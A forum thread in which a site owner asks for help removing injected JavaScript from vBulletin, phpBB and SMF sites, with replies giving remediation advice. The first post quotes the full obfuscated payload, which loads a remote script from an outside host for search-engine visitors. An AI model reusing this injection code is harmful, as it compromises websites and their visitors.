MY Forum is infected ??? I have been battling what someone said is cross domain malicious Virus code. it seem to infect the listed files index.php login.php showthread.php <script>eval( unescape( "%69%66%28%21%6d%79%69%6b%29%7b%0d%0a%76%61%72%20%72%3d%64%6f%63%75%6d%65%6e%74%2e%72%65%66%65%72%72%65%72%2c%75%3d%64%6f%63%75%6d%65%6e%74%2e%55%52%4c%2c%74%3d%22%22%2c%71%2c%71%75%65%2c%73%65%3d%22%67%62%22%3b%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%67%6f%6f%67%6c%65%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%65%3d%22%67%6f%6f%67%6c%65%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%6d%73%6e%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%65%3d%22%6d%73%6e%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%79%61%68%6f%6f%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%70%22%3b%73%65%3d%22%79%61%68%6f%6f%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%79%61%6e%64%65%78%2e%72%75%22%29%21%3d%2d%31%29%7b%74%3d%22%74%65%78%74%22%3b%73%65%3d%22%79%61%6e%64%65%78%2e%72%75%22%3b%7d%0d%0a%69%66%28%74%2e%6c%65%6e%67%74%68&&%28%28%71%3d%72%2e%69%6e%64%65%78%4f%66%28%22%3f%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%7c%7c%28%71%3d%72%2e%69%6e%64%65%78%4f%66%28%22&%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%29%29%7b%20%71%75%65%3d%72%2e%73%75%62%73%74%72%69%6e%67%28%71%2b%32%2b%74%2e%6c%65%6e%67%74%68%29%2e%73%70%6c%69%74%28%22&%22%29%5b%30%5d%3b%0d%0a%69%66%20%28%28%71%75%65%2e%69%6e%64%65%78%4f%66%28%27%73%69%74%65%3a%27%29%3d%3d%2d%31%29%20&&%20%28%71%75%65%2e%74%6f%4c%6f%77%65%72%43%61%73%65%28%29%2e%69%6e%64%65%78%4f%66%28%27%77%77%77%2e%27%29%3d%3d%2d%31%29%29%0d%0a%09%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%73%63%72%69%70%74%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%62%65%73%74%34%79%6f%75%2e%69%66%2e%75%61%2f%6a%73%2f%62%69%64%63%68%2e%6a%73%3f%71%3d%22%2b%71%75%65%2b%22&%72%65%66%3d%22%2b%72%2b%22%27%3e%3c%2f%73%63%22%2b%22%72%69%70%74%3e%22%29%3b%0d%0a%7d%0d%0a%7d%0d%0a%76%61%72%20%6d%79%69%6b%3d%74%72%75%65%3b" ));</script><?php /*======================================================================*\ || #################################################################### || || # vBulletin 3.8.1 PHP: this above is listed in the index.php login.php showthread.php how do I secure my forums ?
Update your forum software to the latest version. There was a recent update to VB just a couple of weeks ago. Ask your host to update the operating system, apache, mysql, cpanel, and php to the latest versions. Read through the vbulletin security suggestions at VBulletin.com Change the Root, MYSQL and forum admin passwords to something complex. The files that are being written to, make sure they are chmod 644. Whatever modifications you have installed, check them for security updates or bulletins - or remove them. I suggest that you only download modifications from vbulletin.org. A lot of the modifications on that site are reviewed by the core VB developers.
The latest version of VB is 3.8.1 Patch Level 1. The patch was released on March 5, 2009 and fixes an XSS flaw. vbulletin.com/forum/showthread.php?t=301882 The patch deals with an XSS flaw, just like the kind that the attacker is suppose to have used on the site. So updating the site might help fix the issue.
I guess that answers the question everybody is asking - which forum software to use. All those weirdos who recommend VB as "secure" obviously don't know what they're talking about. Man, quit spending money on overpriced, underperforming, buggy and full of security issues script like VB. Not worth it.
That is not a fair statement. Especially when the source of the breach is not known. This security breach could have come from almost anything, including a misconfigured server, out of date modifications, weak passwords, brute force attacks, outdated server software,,,,, Instead of pointing the finger at VB, lets try to help the guy figure out "where" the problem is. And if he can not get it fixed, he can submit a trouble ticket to the VBulletin support team.
What are you on about...the OP has not updated to the latest version/patch so therefore how can vbulletin be blamed ? Also, vbulletin support is the best offered by any forum development company so I feel that your comments are unfounded. Lets help the OP sort the problem rather than hijacking this into "the best forum software" kind of thread....
Thank ... for finding the code.... Russian bastards ... have nonthing better to do .. these FAKING CACK SUCKER...... How do I remove ... the code.... it is cross site ... so WP, Joomla all have it .... how to remove????
tHANK ...you are right... I have 6 forums and had wished of another method.... I found this link.... http://www.vbteam.info/vb-3-8-x-releases/
That is a thread from the official VBulletin support forums. Copy the url and paste it into your browser address bar. Here is an exert from that VBulletin support page.
baonhi41 ...Ihave spent hours and hours reading and reading steps from the link to find the "detail" steps to remove this XSS code
Have 2 ways: - Server is infected. Contact Root server or resoved by yourself. - Your computer is infected. In this case, all files .htm, html, php, asp,... will be inserted that iframe code. Fisrt your must sure that your PC is made clean virus by scan PC with AV or reinstall windows. If not, iframe code will be re-inserted. Download your code from server and use Advanced Find And Replace to search and Edit that iframe code. Upload overwrite into server. You can contact me Y!M xibamvailolz to discuss
Your suggestion 1.) Server is infected ... - My actions was to contact "Host" = hostmonster and they said it is my problem ....I should fix it or be banned "web sites shutdown".... so I am very worried trying to fix this issue. 2.) - Your computer is infected. - Have run two virus (Avira & Malwarebytes' Anti-Malware) both show "clean"....Other computer (2nd) Laptop shows site listed below has code in the header "XSS" ++ 3.) I clear cache and cookies with my browser FF3 and IE7....site below shows the same on both computers. Listd below is one of 89 sites... my nightmare.... and the last 15 hours trying to find a solution. i HAVE BEEN testing to see and find a fix to remove "XSS" CODE XSS ME - firefox addin Acunetix Web Vulnerability Scanner....http://www.acunetix.com/vulnerability-scanner/ Infected website.... http://www.hurtpartner.com
If the hosting provider will not do a security check, its time to find someone else. That site you linked to is not running vbulletin, its PHPBB. My first suggestion is to get rid of PHPBB and move over to MYBB. PHPBB has a history rich in security problems. Over the past few years I have seen communities destroyed by hackers, and it looks like your is no different. Remove PHPBB from the server, delete the account its been installed under, create a new user account and install MYBB under that new account. But first, find yourself a new host.
KEY~~~ this site listed was one of many site with the same issue. I would like to say how much I respect your advice ... however I have concerns.... 1.) the recommendations to first have to change software "forum" for this site because of this XSS issue. I am sure if as a last recommendation to delete the forum software it may resolve my issue .... however the suggestion seems like a temporary fix and an extremely aggressive step .... I maybe also agree with what you have said about phpbb3 ...as I too have read alot about the software problems. BUT .... TO change the software will not fix my XSS issue on may 98 sites. Example of another FORUM SITE using SMF .... http://www.forexforumtoronto.com/ I have spent hours replacing may PHP files at the SMF site above so the code "XSS" may not show up for another few hours ... injected again .... 2.) tHE first example of the XSS was a Forum with the software PHPBB3, THE Other 4 forums that are VB, i could give you a link URL for the VB sites... however I have spent hours replacing some files and updating versions, so I am waiting to test to see if it works ...~~Most of all again "again" this will fix 4 forums that are VB .... vBulletin 3.8.1 Patch level 1 ( misc.php and /includes ) the SCOPE of my problem may not be just one site or software ... I am trying to understand and tackle (remove) the script XSS.... i have changed passwords (many time) . I have password many folders SUBdomains on the server. 3.) OTHER SITES - basic site with the code .... http://gizbuilder.com/ --> </style> <script>eval( unescape( "%6 PHP: THANKS FOR THE ADVICE ON the hosting company ... I may at sometime consider in the future...... however I am trying one problem at a time " new host"